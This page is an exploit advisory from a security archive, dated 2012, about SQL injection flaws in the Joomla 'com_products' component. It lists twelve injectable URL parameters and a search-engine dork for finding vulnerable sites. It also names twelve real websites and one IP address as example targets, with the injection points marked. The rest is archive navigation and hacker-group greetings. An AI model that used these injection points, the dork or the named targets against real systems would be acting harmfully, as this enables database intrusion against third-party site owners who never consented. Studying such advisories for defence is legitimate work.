Joomla Products SQL Injection

Joomla Products SQL Injection: Posted Jan 26, 2012; Authored by the_cyber_nuxbie; The Joomla Products component suffers from multiple remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | 16fe7260bde5adf260a7e400d2c3e713031e4353fb1630b08f7999376850f6bf; Download | Favorite | View

Joomla Products SQL Injection

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm NuxbieCyber member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[ Joomla Component com_products Multiple SQLi Vulnerability ]

[x] Author : the_cyber_nuxbie
[x] Home   : www.thecybernuxbie.com
[x] E-mail : staff@thecybernuxbie.com
[x] Found  : 25 January 2012.
[x] Tested : Windows 7 Ultimate.
[x] Tools  : H*v*j + SQLi Manual.
[x] Dork   : inurl:"/index.php?option=com_products"
________________________________________________________________
****************************************************************

[x] Vuln Exploit Report:
http://localhost/index.php?option=com_products&task=category&catid=[SQL Injection]
http://localhost/index.php?option=com_products&id=[SQL Injection]
http://localhost/index.php?option=com_products&catid=[SQL Injection]
http://localhost/index.php?option=com_products&product_id=[SQL Injection]
http://localhost/index.php?option=com_products&task=detail&parent_id=[SQL Injection]
http://localhost/index.php?option=com_products&task=edit_productdetail&id_pro=[SQL Injection]
http://localhost/index.php?option=com_products&Itemid=53&controller=home&task=displayitem&itemcode=[SQL Injection]
http://localhost/index.php?option=com_products&catid=1&Cat[]=[SQL Injection]
http://localhost/index.php?option=com_products&cid=[SQL Injection]
http://localhost/index.php?option=com_products&view=products&id=19&cat=[SQL Injection]
http://localhost/index.php?option=com_products&task=product&pid=[SQL Injection]
http://localhost/index.php?option=com_products&Itemid=[SQL Injection]

- Example Website Vuln:
http://calconsystems.com/index.php?option=com_products&catid=23' + [SQL Injection]
http://krudkutter.com/index.php?option=com_products&task=category&catid=2' + [SQL Injection]
http://winnersedge.in/index.php?option=com_products&id=7' + [SQL Injection]
http://lightingplastics.com/index.php?option=com_products&product_id=51' + [SQL Injection]
http://kiserrenovations.com/index.php?option=com_products&task=detail&parent_id=2' + [SQL Injection]
http://mekongtech.net/index.php?option=com_products&task=edit_productdetail&id_pro=120' + [SQL Injection]
http://questleisure.com/index.php?option=com_products&Itemid=53&controller=home&task=displayitem&itemcode=7519' + [SQL Injection]
http://bonefracturetreatment.com/index.php?option=com_products&catid=1&Cat[]=44' + [SQL Injection]
http://natcobd.com/index.php?option=com_products&cid=3' + [SQL Injection]
http://rocky-s.com/index.php?option=com_products&view=products&id=19&cat=20' + [SQL Injection]
http://173.254.37.56/index.php?option=com_products&task=product&pid=4' + [SQL Injection]
http://questleisure.com/index.php?option=com_products&Itemid=53' + [SQL Injection]

0day n0 m0re...!!!

Gr33tZ t0 :
[ 1337day Inj3ct0r Team ]

- Thanks To All Exploiters From Indonesian:
Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto,
EA Ngel, eidelweiss, Flyff666, Gendenk, gunslinger_, h4ntu, h010ng, IbnuSina, irvian, Jack, k1ngk0n9, k1tk4t, k4mtiez,
K-159, kecemplungkalen, M3NW5, Mbah_Semar, mywisdom, NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, S3T4N, s4va,
skulmatic, spykit, Sudden_death, team_elite, tempe_mendoan, the_day, tomplixsee, vanzay, v3n0m, vir0e5, Vrs-hCk, vYc0d,
Xr0b0t, y3d1ps, Z190T, etc... 

January, 25 2012, GMT +07:56 Solo Raya, Indonesia.

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Joomla Products SQL Injection

Joomla Products SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Products SQL Injection

Share This

Joomla Products SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems